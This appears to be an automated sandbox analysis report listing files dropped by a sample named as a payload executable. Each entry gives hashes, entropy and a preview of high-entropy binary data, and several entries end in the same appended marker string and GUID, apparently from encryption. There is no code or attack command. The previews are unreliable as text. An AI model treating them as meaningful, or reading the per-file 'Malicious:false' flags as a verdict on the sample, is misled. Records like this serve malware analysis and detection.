                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1413
                                                                                                Entropy (8bit):7.839972000420886
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:raS6juFhtSgSfYNlAOPNN9dsdSmE69DS46fS3UjtXUJMQ+xghn0+z1x3bD:UjusYNl/9eSm5pY1xEJMQ+CRvLD
                                                                                                MD5:565AF384C9CCA7AF3E610BD8329EC9AF
                                                                                                SHA1:6C10BCF4637343594DD762F305035D8E62B65E1B
                                                                                                SHA-256:C186BD2FDA31ACF332C96A8ADEF66049D4CC052E24E4BE6B8E5E5F2A7484155C
                                                                                                SHA-512:EAC8643803239E5A7FBC616E33B8051D0D4BA3FB451AEB676BB8151777BE02C34B3DB0EE30A4A7B4291142AF03BC18C3601C092425368AA52BB3323E72C880C0
                                                                                                Malicious:false
                                                                                                Preview:<?wpl..K<[a8.9Hf=.BG&+i..b.^S#;\..2F&......./.....#q.....A!.uA.lgMz..,.s.7.uR2....f.t..^...O..58V[..Yd.~...v.E...w...b:_.}..&..U.....ve.5.sIx*d.:...%.2..I......C$=5...<...=b.B..Z.S..E{...#..|}x/4.;...:..v*X.Mc..K..".,...=..z\..s.....L..-.w.2......Q..6..x.....G.A.4...i$.#....<........\....z7...%.......k...`C.|.vV..2..Q[..J...2.Jo..d.zGX.....PEN~3:E..C\.8._..j...6pC..=..l...#j..yi...q..-.Q.......v............M.".p|.]..j:9p........ ..x..D...9.....4...H.v.j&...c....PW]..#...-[...4..-}y.M.[$4.xD....(..K.$..8...I..h.JJ....Z1K.W0......q.7.....T7.G...3.&.W.V.#..`4 ...I.S.0o....2.f.e.md.......d/..L..M..M.9.W8.n<..N.....5..l..ziH.Z....W n......Hl.9.r...^....ftW...,V(H...`f.L.L.luag...:6P...|6q.........@.......x..b....F..f'Y..}.....N.._{.i..^.n..%.d8...8...{.0...v.....P.6.I......Yl.'.iJ.a/.G......E.<..cxi"....GU...E.h.P.....q......,g.Vk.v....<....uc#....+d..;s.J..A...%.....)...5...M.&un........J.m...............$.............7.^]dJ\..U......<..9.1O
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7074
                                                                                                Entropy (8bit):7.970538548416194
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZVFh/YHGmk7DfqbJTqt5Zr6Jy470ajwL/4:X8C7DfwJWt5ZrP40st
                                                                                                MD5:6D88667665399B00E78BC8E337D72588
                                                                                                SHA1:DD13CE497DDB278DA740B315E29AB3C1909F9AD1
                                                                                                SHA-256:2929EEC38F90CD7DD58315B58955E23DB6C6A6F29152C290171F9A280546B511
                                                                                                SHA-512:032289624C164ACA358CFC421B92C3A61F8F8A5C41C75A993C4B94B57CD4BBF6FD9BBA53882E951F1FA9FDF812168748EB29999AACD713A826D83C783B243F1E
                                                                                                Malicious:false
                                                                                                Preview:.PNG.......Ss...a*.y.].N.m.....]....._Z.R..Id...(S9.k.zb....|.....JyB....}...d.Y.4....c...H,Q,.W..NA4.1/SS`.C..*......d....v#...f..b.!...(..!..D.l.....#..[c..Y..d..k.z/.(...3]..w=.._.....+...L.5=......y.\H!....R.,S.^...)s~bV{........b.#...U_...JZY.f/.4.c.!..n..N....%.b.g"1:.L...........+...+.$qN..`.....1!./....m[\Z.W....j....\...%..k.o.....;|.. .6..?...-...z@.h.m..oR Yi#..WLY./'.Q.9=..y."_.....TA.I.VC...$...,..jn.S_..i.)8..]...cU.V.,..l.D6...|..t..a.....^J....!k.l.I.+<.}.R.j........[f..}...K.QN).g. g..z..._...3...)U,...?i...bi...No$..a.d..Ut.t:._..v../..#....f.D...?.Sf,..<2.()@....A....k....8'~r,.>2q....J....,....V.G..jn.%6$.........Z.D........[B.....B$.....""0....V(N.}\..S.k+w.B...K.1C.=.f..........-r..~..!.y.t..g.Qb_e2...-..V.5.5...R..d.....!5Da..[Mi..C.M....qS...xUZu.G...&.-g-.O.M.E....ok.4..Sp{..Pe..u..@....G....>LK.,&2(m...N...#.nE..e..p0R..,/#...R.}.1~m....@.h.......+.~-..j...?\....J.\T{..w...O6.c....G.2...A..pc.c.f[..*..T.6...d<...K....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7438
                                                                                                Entropy (8bit):7.973843923685244
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:MByZjl40oQ1ClUgp1pRugfHSr8GeuDc7RhN:MByZjpL1ClNp8gY8pnj
                                                                                                MD5:AF108626040045D506B25F7F6C85B6DA
                                                                                                SHA1:F8FFB1E6563B8F47B644CACB891EB5CECF648308
                                                                                                SHA-256:C54F848D2A6581398767B8FD44E68267D3D83290763019E47F2412246D8D4BAA
                                                                                                SHA-512:E4BC5D0406FDD97CDD0E4E6A54017696F7E8F9C6EBD7D8244B921552DAE634AC43ACBA7E4F573268C8A7ACB386989E33DEEB9D328716C1FDF6D3910719CE37B8
                                                                                                Malicious:false
                                                                                                Preview:.PNG.^..D....%....p.T..9..&i..1!..X.&....3.s.]W..,.q..V.....r.i.z...V(.h{k....j5@.Nh..p...7......}...?4\!.o|.tY...3..8X.F... ..o.R.6..f...e.Q...J..j.Oi;..C.n.M}[."l..^...(].p.......{...v.>..n..U..m.".P..:.F...7...s.tJU...(.b.i..q.M.{!.........WF.lk.A....|...nfE..P...!...za...a..G}...p......rhF...}.4$..]/.w.%;gN.o...f..g..:..+,'C.W].....y.....*}.Yp4..d.......rJ...t%...A......>._...y...2Wk_..Ft.d...t...w-=..j..9.w..kC..D..P.~r..Y...U..6S....vD.t_.,.E..#...........v...9Wl..Lt..m]...TH...g!M.H.M..?...%w....{|C..u...q.Mk.s.d..r......$)..6.eY......i..D...W..H=..n*....?...k....... ..)kU.:7....r.R..f..g....%...#..3.$.vl..x.zL9Q....TS.!.\.....n_.7wl.....I;#. ....q%2.b......A.Ks..=.&.}.RO.....p.`I)..Y.E.../...M.%..fE..YN..C..5>..T...7.g.u1.+.WV.{..-D..2rN:.[...C^#..R..*S.-..$.0..k...../R9#......W.r.aL.ga..NA\v..V.c........;C\...$.E..t.0.#.by.P.q.yn.1.....b]OK.#..M..:...Q.JCMpI.2.bA,.Q..Wy...]?......S..x...2l~..........U...M,..E7.s3Z..8^.B...\S.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8887
                                                                                                Entropy (8bit):7.976893187755186
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:SxjDsOm24G6GRdmf3Yvp7Cwh2CEibPIGL2JmJgXWfvCVjTq:SFsOfJj+YI50D2Qgv4
                                                                                                MD5:904A733D7D71FB8E2A6B9214FE3133C4
                                                                                                SHA1:7331856C9DE243F0F5E71EBC988ABE55C8B672B9
                                                                                                SHA-256:4C32173862AA6F842ACB0B2023CF56317EFB392EAAD4BB13E649E8476C92E632
                                                                                                SHA-512:6D6311C81C94A4B2C4EEA9DF6C698A4091067F1B7BD6AF14B33B9E2D65D4467FE3CEB272CF24797FE565CACFA4F822BF464337A255CD916ED479570199F1E536
                                                                                                Malicious:false
                                                                                                Preview:.PNG.GG.Y..(......r_..@.N]#....C...X+98..(.ab..'..7.5...O...E.S7h?..Z......E....%.............K.~vgA....V..n..j.1...(.+.....{..ps^... ..J.(..$e....7R..7)')JF..1...^x...W".$J....F/..6H..8...>...K.f........3..9.0......|.~FL,.~..$7..9D.U.~....(.2...(xT...Z.p..r.3Vi.......UCJ.o"*.Q...t..}..e..T.._..B.T.[5WM|.P.3.L\O...*.....^....H.......T....|..x..r....xn(...y7..Q.....g..{.m....5.oDW..].!..#Q;..$.?..f.L..H.....e....:.I.....b.7H^B......Ao..5.5.......T....O.....F.3.3..s.>.UJ.G....H.n.q38......y..l..f....=.Z.D../|..1z..\.{...O.=..o....4...D$..\....</..q..U.o.M...Kzo..../Dq6K4|i../...L14m|o.....Ey...<.m._R......D..........5.|.LPy.P...g....m.E.\..*Q0......~..o.,.:GSb..M...j..L.F#/c.....f."._.>5.snX.I..V.2qP..p...&.3K#...@.....&.y.6%5..d..1m..bD_.8H".........l.D..{.AY.`f....W......W.s..W..=@........w.I.u{M4o\TV........D..R.01.v.pv.6hZ(.....k...ICGz...V......M..#....yB.....N..4=.'e[..:IY%*.....|CM....Hfe.y.=x.........I........z..>......Z.h..;-|.t.7....]+tK.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):14457
                                                                                                Entropy (8bit):7.986821238588996
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:0g9XFKARpsvAYs8C2fOruNhpQs0RD+/lyZ8RK4C0Aiz:0KXdevAYs0OruDCxRDklq8XCK
                                                                                                MD5:75FA0F1FCF0E0F2A3F1B655F1F2A21A8
                                                                                                SHA1:E6959D3F4533B00DCB874456E83AC9970E0FC4FB
                                                                                                SHA-256:0730FF84C1B48B3CD079C2B84C4ABD6D7C514EAAD78423CB1E9F7611A0387408
                                                                                                SHA-512:49DB53321AF8CF1A5F1EE5EC70C7E5AF2EFF105A13C29393AFDA45D5BA24E590AEE2174034F1591C59A30EB1849D086B5E13F217331140202BE1E457F18A7A90
                                                                                                Malicious:false
                                                                                                Preview:.PNG..=.exJ..Q._..k.0Gt...J."1.P"y...*....".c...b._../q.K..\ .^r.33...]|.p..b.W...y..B......l............D.3..{....j....vt.hg.*.....6.....@.'+..nu]@.$......?.m.._.Se.P.`|.Es..|.Z..`.".."..x..A...c..,.$J....a."._..[& 9..v.N.?.....6[.N.;.FD..-..w?Yqv"....e....@..PV..%.JnR..W(....|.ZW.\...K.R.D`.VH.-d.:........AfR.W...........B@}f.0#.{..S..QJY.e...}(S..|.:....c.R.'t/.R.D...^..P....?.......&....GY......U......Q1?.K..<...V:..X..]0._.T./.V.SzC.9v.=.>GsK&,(...3.k.K...=n..7F....x...-aVz.N*.M.g[.W...5......66"..n.$Z..5...?.$....u..h...q.+..e..pc......9.E.a1pZ.IZ8fe.e.u.?..b....4f...LX.I.W..p.._.h.)....}..$N.wa.9...N..nM..5....p.t..z....!_k..t^..q.....3.r...v..P5..d..o......L=..6...'..`.m.J5.\b..Q..T.E.....B..'u5.[.k`..N....u...k...*.i...Q..j..x...M....I(....F....N.\3F.^.j6Y`O.,q.m..5ur)'.#.4.4C...0...y.....1.&....Z....>|...b...F{.........c..^......M9.Vp........|wWo....m...-<l....P8.f.6.5%Y.....0O.n..zn:.*...4....*A..G..K-.].... .0{.W.....hYi..E=o
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7986
                                                                                                Entropy (8bit):7.980554104691757
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:1Q1HtvrV2tFmxL7pdU9fB0H+ZBv/hMMRVVYIOeN7bfyFz81:a11rVWFQp60eZBv/hzVHL5fuzY
                                                                                                MD5:55EFCF9C034437FAD5D37B781EEDC272
                                                                                                SHA1:A7A8E0789CAD833C0C28B51B9DA14391DCB4F3E6
                                                                                                SHA-256:9E8C148826CD79F2C1BA9DFC4DDFFD13576A35AA5B1EBBEEBE2571E678939AAC
                                                                                                SHA-512:0BE8570673507E7A26711DA00D4E3199467006E599CFA56D8B62DAF937D880C65D1DA87EB6965DA72CFCF7039883347063D15ED36CF654069F77301B70385C28
                                                                                                Malicious:false
                                                                                                Preview:.PNG...2.f.9....-....../...........2...i..AG. lL.,gO.W.n R.`...7n.xY..Q../t?p...s.,t.......=.$8..x.;..a...8r.j...W.C...r.....]..g....b....j."MW.e6...T.0).Z..:.N;.../88...&.......=.6...`T.y#..E...]...La.{.J{....Lw5...E.+.%9....@..5..fj.(...........n.3.....H#..eZ3.............:+.}t|...9.L...\.k...&...9.M..Y.....r.}..l.8....."..b....R..9..w....s....I......X).x....@7..v.R...ufu...........K-.p...X~Pl...!.4}T.s.`w.......6..e,..-Q.YgJV..i....^..H./}.y.'[....&.id2#..Ia}.. .G.....z..-....G..^....&.(..6{/.8....._T.F.?`........N^..q.K..}..7.......e.j.^.]$...^^.*..o.........mrR@...IR..o.U.3.z.-......|'.oPX.P.......G-R>..]8..J......%.FF..YLz...z.h..K..<L..:.m.=,....9.GL|.5.u0k</.X.....Ys..Y...t.yr.,..f.0...[.&.(......K.=.h....&.B....12.]...D ........b.Xhi....<..]U..9n46Z..N..(..4.i.../t...$L..P.`p...).. +......P3# ...8Y...2.'..b.;U..t|.[.....H..gaf1..^....x.v..A......C.Q[./.+j...4.M.\....i....x..(Y.X....Pn.5E7.N..!./.c...fi....N<<.....>t..k..s...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5293
                                                                                                Entropy (8bit):7.963734697677249
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:xT5dRet6e8roaEVBYD/W6bGLotjpuoLL5DKvu12LbR6IrEh5jBHNTKVt+:1WL8UebMopuE5Ed6w4jBHNT4t+
                                                                                                MD5:E794C55AD909DB09EE8E981A14268993
                                                                                                SHA1:CF9807F2082250C59B01DA818E639A9C68B354D5
                                                                                                SHA-256:B0B35CA1D8E6B112CC62EE29EA85BD72A674A391D84E68E758817258E1F88ABB
                                                                                                SHA-512:06E6EE519E13D3C9FA3A4CB07A016B1E22C1E947C8C7F2208403C68185483A14988FD1DA4B8FA6C7C56E79653505DBAF59A78AA72537EEED9D1C8E0F24D56059
                                                                                                Malicious:false
                                                                                                Preview:.PNG..i...zV.v..n..+.u{....B...c..3....P.Mq%Q....#.....m..f2.'..k.|v%.D.rw..p.]WW/.'..8r&l..ja..o...-..;.(e.R....)}......M.-.}.%Pi.T....20...R\.\XI4.M1......q.hQ@+................j.:3\..K...{.~a..2pO%..O.!...c......!4gT.P.g.....D.k..ZM\C. .a...M...D?.U..m..........-...9a. ..oh.`j8.d/.S4..y.9.{.....T..[.a.3...L..U...q.j.+Y.D.jp..0..(%.qW6...[.n*.\...E.....D....cS.[./.X...g..1.N........S.F...88.{..@..........8 .]..a.e..Y.......c...hk%......D......w.sA...I;j.dK......~,-.].[......7.Ka.@.0'.H.k...P.qP....9..|..&...#.V9.+h<cPSe<..t>UbH5.JU.\..Q.}.,.q\0.h...K.&e.D.z[r.M.....x...3.n..0.x..V...R..}g.{.....s..{.R.}.....$.k..?W <.6.Y......s....UQ../=.<....._..m3.]v..2B).....,\...s..B...E.^.8......"....h/F.o.;....$B..s..r.._.K..GZj/j...c.aI.....#...6.....M6.oIV&..9C..\....w..mI.g,."\.1../....!.........v...v..F...s@.3~R..n?..+.C./...SD..R..c.1_F.On>.(ns....7..W..<.3.f.P....t....j.Aj.;G.5.O........\.6.N...BP...S.O.uhd...z~2.rI..}...Pf..g^:..../.....5.A..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):9080
                                                                                                Entropy (8bit):7.980635307378518
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:8PmCYJmf+n5kw78EhPqbSIwL7Y7CskTSlvghybO7u:+mCYQs5kI9hdIwuCSvwkO7u
                                                                                                MD5:128AD5EAC8E233D0E0E249346B62F9D9
                                                                                                SHA1:2BFB43C3B62657893C207FAEDDB3936E298D2E7B
                                                                                                SHA-256:8AA9FA70738B708B0B1CCBA54DEACB520B3C5514E984EAEFB81125D4CAC4D007
                                                                                                SHA-512:0AF6FDD6ECC6EB1D5B7E80DEB43A30F7199DB295BA809D08A406685CF7C3AF9DC845479A3F1C29BEB38BAB288B7E74927352A62AEA65E088666C6C3BA0CDB065
                                                                                                Malicious:false
                                                                                                Preview:.PNG...7.&@@...5\jdd.2...!9Vz..Z.../.......0*;....##:I.} .R.M.S...v{(W...~....1....n)...E..mP.....T.t.q........^...)8+.....F.#..q........W.Z+.SK......w...........b:n...am....D...X(.n......5.o......F.&k4g..y8.8.....!.........#.E..d...>.o$M.b..{..+..:j.*.......u..@.#....JA..i...ly.).o...N.!.].E......h.V'....y.....M..`..w.`.m.*%Y..'.?..o-i..L..l...T.^f..g.3.!d..O......K....=...K#...g..6D..TT4p..CC.^.q....^...A..L.'j..........^?....$~oo.P..6.0M.Y............A..+L....[.i...l..n..L....:a...T;..../..4....c....W...Pd.....g...l6.'..|.f'.,l..9S'rn")D.%...6..B...!.].,...h..[.....~c.-....../.T....$9]z(..;..*..(.?.}.......i.q<k.W.lf.....d......?.#...tH.... .Q......1S..ai...D?.@p.q(.$ t..(....M.<rv.k...^.f..x_..pR.0.....tq.g+.;B..R)..lN&~..C....*F...H.sg.*..?#Qd..U...!....q....n1..pw...'\..&....'.....5l.Y.....M..N...h.1.C.%.......{.[.)/]E...B....C....IM...D...X&..........l....R.G.A.0.n..(\.....:c....{..BL|...K)......v1..W>.......f;..G../...M.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):9025
                                                                                                Entropy (8bit):7.978609102061716
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:8VgOJzfD4y07hQLNKDL+fbWFDNSLzuCa/IILZpHhbbJclFNJs0G:8Vgqf5AQLNeLtCWbRJoW
                                                                                                MD5:687C0968E67B1FCB23FFE71171D4E926
                                                                                                SHA1:D46517005E13A165B4E8174FADE7A99C131C8B4E
                                                                                                SHA-256:33078FDAEE8E199B1415F249110CD98DD6C3DA9714F5BBDF2965739B24B69B27
                                                                                                SHA-512:3DDD3D84CD8EA3D5092620F7437BE485033763FCC606BC918696071B475A06A479E94444A1D829F4A5A20A57AF2E1156ABA975DF7FD9548D0D513E2B4B54149C
                                                                                                Malicious:false
                                                                                                Preview:.PNG...Ki..1.<..5.p.....N..aU/.....%..Q.2,...0;....G1..yt.F\^...a6..].....p..5....rD....4.8.\.....JDk..ih.j8b{0.-........g...*s..w`...Y....Nt!.Q..}..."+Z..B...-D....<G.z1..]...5N.x...k..{)....&......Ry...>$.t...BLp|..G......r....'.$7M..+....*T.z-x.......$.E\D.Y...k|...t!z...m./.....;.9F.6.g.l.^.G.j....L......b.>...b._.8..bBF.^b.[.".{[.I..1.N.&...;}.}K.M9.@.SU....h\..I...a...`....Y.{.u..mM2EYT ..I.,..>..$.5. .....`2Z6....1 .T..,....o.....c_ ...:...[I..@.%/..S.#.K...%.`.y.....m...`$.2.I........a.'MC.L.C]."vXa}.N..|7.;..JY.U...U........e&.4_.s8W.TC(.".afKb.[H8...z>c.B.4.r..../..&D..f...dX.C.G(..F.w....8.Fa..i......syF.....W..o~5..lj.......2I..Z...._p.`.w.Sa1.}(.....X.@7...T.Z..F......n..A..*j.7..d.G....o-"o gK.....D.NP`.b.n^.t.Hl.0I...h<..S..?:o. ^;...}.FV.4J..,...:...,.....eQ..(..Y..x..`n...:.s..2.<..Bk.~d.+..CgK...%.!>q.&...\&g.2...F...K.....g..Gd0..?...K?.[.~ZB.oa.B.t.X@=.../.$...F.GXB~K.....F....R*...9v..z.^9&..f'.#..||..;.......[...X.5..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):843
                                                                                                Entropy (8bit):7.7686456091951
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0cxoI1J00Yw0PouzHD7Zg9+Px6DbuxTSO5x3bD:0Ao4FE/S4wXuxTvLD
                                                                                                MD5:7655FFCD46E1066A34EE3F1FC6CB933F
                                                                                                SHA1:4988F0C2468ACC4851A4393CE07EEB233BE3233F
                                                                                                SHA-256:96D436952C0FCB45FB093337E1ECE58A86D139A4C0034B3CF4E28013DA8103A5
                                                                                                SHA-512:58BC83FC2E9559B421C90BE054ED5743BAB1EFDD3445EAF18588241E3C174BFB4D8ED691612605F515FFF9C114A7522A241E436E00F0347B7AE2966122AFDED1
                                                                                                Malicious:false
                                                                                                Preview:<?xmls......./1/..-=....A..Vh..r/.!FZ...l..;)L....5.7%...?.yp.:...N.![;....[.4.E...~gY...<.v.*...{u........o@.."....-....Y......W...cs.I..b...$m.k.Oa..Om...s..C.M..p.z'..]...s.*{...j$(.w...:.=.h.)......7...@.k...j#.....{&..U..........s...h...m.?.A.4..t..$.z....*.\...2..DP.4....X%o..&e.W.N4..3..m?.X[.D.....X%....%..8...1).f.ku.ZF..;..>....`C.....i......GpF....4g.p....~p~0...z?.@....r......$........S...+#....7...d.bGz>.L.NO..M.P@.. <...z..u....qJ.......z....Mp...:..h.`\...=...&.F....P.G.-..'......VXJ.5...J..f{e=....:.......A....F...C.t..&....~./ta..Y..w.s$..$; ...s.c.H......O..`5.N.X....*^.-kl.P.X0+...]q.......\O.I...,..k...}..E3..).K.3P..y.9p...T..`..9|...7....!...L..GOu..;.i*x../.C.....Xr.e78M...5.p_V,.'.a..Z.#.B@=.=.LBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):849
                                                                                                Entropy (8bit):7.715730561126815
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:UASX6ZhEDXdhiw+9R8TFmJ6nGYrLGdBGlOx+gC4yKAte6RmTUw88q1XW2ucwAgJ4:UXIhEDNhx+9uTFm0bvTr5tFu88q3x3bD
                                                                                                MD5:EA856B3DB3EA5B9A1D70218F30B1AA04
                                                                                                SHA1:A082E414D03A70FDD1B487581A6D0216080E22FB
                                                                                                SHA-256:0EBA8188C8DA3263DB0552CECCBF8C012CAF4E6952B2C981812A437EA957C88E
                                                                                                SHA-512:49C58E5DDD2E97DA85AD056B1EC72B61A640F2323F54AE9E101D166DC5C612D6FD929F80F37AECCBB7446C8F914A3620D0C0BDB90600FB75D11C9317A36FE406
                                                                                                Malicious:false
                                                                                                Preview:<?xml.:.k*J.].l\;..#....|k........f.......w..4%.....{....Z.6.20..;O.f.(..:..V\..}.........tFZvg.;le..."a...G.0.D.U.....B4`.?..Hk.?.z.....E.m...|...U...r{L.JR...}9.0..t!.J..b..C..5.`..rv.te1y ..?.J"*...Y..fm.f.K.U .N..x...&.:....7eI.+..Tn.^O>3DX...!...[.........gS.3.3.x,}..D..W....+I.M_C.e CS$..QJ..q_....k...6....h.e4m.o...OE...c.w@...ec..~.,.j.w..7..S.VK.+...V.....[...(...-...q..(.Tk.LW. .ro......h?.).2N...|......!<.FwP.4..... 1....r.M...#|M..T{@....k5..r.Q`.uE.C...e~....C.6.VA3....%.j.......Y..=.MT...7.......?{S-AT.z......Y.O}%$#C@...Zu.m.u9...]..y$..z.s6...Iy-..%.cY..R....a..;}.x.H7...qKO....N...p..,....Z.&..,....tW..z.p..UU.5._..*sS..*.}...X.Lbp..MY...-..ZKWd.?.].I..w../.U..#.5.......J....`.c.Y .^A0f...7...LK......H.....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):835
                                                                                                Entropy (8bit):7.755160251336358
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8PfjxHVeh5gzmgmOJHCcdBe25GyKfwya5giEjwx3bD:mflAh5gz94crV5s/ngLD
                                                                                                MD5:68C304400D5F06CEA64D89C4C81617FD
                                                                                                SHA1:B91516270DF34CA11D1DB7C4505BDE486E1FED77
                                                                                                SHA-256:BAB7D636DADB2F9FA6D3FAB06FA3B42B6C22F49D83FD503EF0D7C44F73F663B3
                                                                                                SHA-512:AD255809F2694F5A3BC54B4D45591518BB0473E22E2011AE201FC768262B0BDD2F9023916DD76545F2E7970EB82846882A1FA1FDB192E97E6F8CE2B17E2F00FC
                                                                                                Malicious:false
                                                                                                Preview:<?xml..k.S..|5M..w.:..8..4.`.Yz..b...y.\.7...].....FB.}.`..,pw.........b...p.....E!..n.?/<.Rf..s..f.g.......7.2.|.....X.~....+x.R..:..R.N.?..q.....[..{.....h).f..e'.M3...".K.,d..;.v..uw7..n./..<%.^~..p.....`l....O%.."K6)'P....4.D...SDN."...&/.:.G..X.G..A.b..%...A.:.....)M.kp...q..D.\+...W.C:_.1*.). ]..1.pu]..CU}{.W.....w..2:a.}...F.v..UK..^V...+.~.,;...i.D\...K......0.*.0M...a.d....$...k.>.y...O....96.I....k...zF........fv..a..5......<.>...O......:..A..o.....0.....J...HU..,.$.\(..\z..!U.......n.`.. n........x.y.^v...............9....y.=.....7..x...(......O...7......hs..g..Q.i...:.....`. ...V.dQ...v..]-1`<g.Z@w_).Cj..z.s...)...2P..(z..l.xc.Rn...&(/..%..J.RO.5...F.<. ..^.......XS....lx..S4.7.k.B.-...iY...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):752
                                                                                                Entropy (8bit):7.7136733709329866
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Yi98uLyV72JkoL/xJ79/6vax70ibLb0c+UTrGFDVqPSrUCHVcASbNQW4B4SgJc3X:Yi+jq1/x/yvaqGb0c+eGZCfCch4BXx3X
                                                                                                MD5:B040DD17FF929755ADB0B80665A9F621
                                                                                                SHA1:B41FB4F1291FC7D17369EA6D4825E0271EE66452
                                                                                                SHA-256:661E4A3AD2ED47FB9349C7BFAD1E24F9DEF03AC8C5ABF697DDE60C80528393CC
                                                                                                SHA-512:93FD25EE9B17E9D07621F3AB88418C0C672BD333635DC2A1489A64442C118585F0374A47663B1E70E163FC06B3552603A7EEBC8C3B8F295415E68BF634C5201B
                                                                                                Malicious:false
                                                                                                Preview:<?xml.f..E....C....^.GT.^.q.Bw.SL.^..7.k"m.. ...V.5.\..`+...N. ...I...\x~......p...........P.n...(.E2..4s.gZ....a~..r..\..vr?....}W.Ur...W-]<.&Y...._.....J?..:A.dVd...6..K#..G.1.z.Y.H.t.[....?.`.x..e..['..Za.hF.^..lY}....'.~...N:.......=s..GR.kc..8..wT..<e^.%..........9..W.aN..(....N..k ..s...%..G7....M..N..D.k..B.c@..$Q...>^..AC..E..m...|.u.q..9.. .z...qm/w..F.~.j&......9.~.N..Xd.[.s.......5..O7....L.~;?W......o.|9...d.5*}(........t...s$H1...5..tA.2.H..#....28gR.W.<<.s.*..;..K...4#../r.7.m.j.[..'N..b...+.E..wK-.R..XbMoK.1.....$r.g..%*..1;=...O.......=...J?......f.....N...O>}l.....[..`?.X...j....&N.Xd.....?:..Zm....yq...d.i.L.Z.<....OBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):752
                                                                                                Entropy (8bit):7.666105639611684
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:cKNyiJzzfbPIdYflPgSUu0ZG4HmliDyKuyEw+MwOKCLWHz9HvEiLyf1iMXruCAxN:coygJPgjGmSjbMwwKHz9PRGiiuCGx3bD
                                                                                                MD5:F217C9A0B09A30EC632BE1A016105718
                                                                                                SHA1:F01356BE0A2AD90A2D2FC5E9491001643B9B7E87
                                                                                                SHA-256:964EB846ACFCC73485B93D2AC36B535F36356DECB74C128F32E3521AF1FF387B
                                                                                                SHA-512:72C03DE413ADA0F50A72046EF3BF6EBFBB062AFC85CAF36F0AD8CF4B714094D90FB005113740915059920B5604CF3EC7F80B9E68AB40FC241458F99DB38C4D6A
                                                                                                Malicious:false
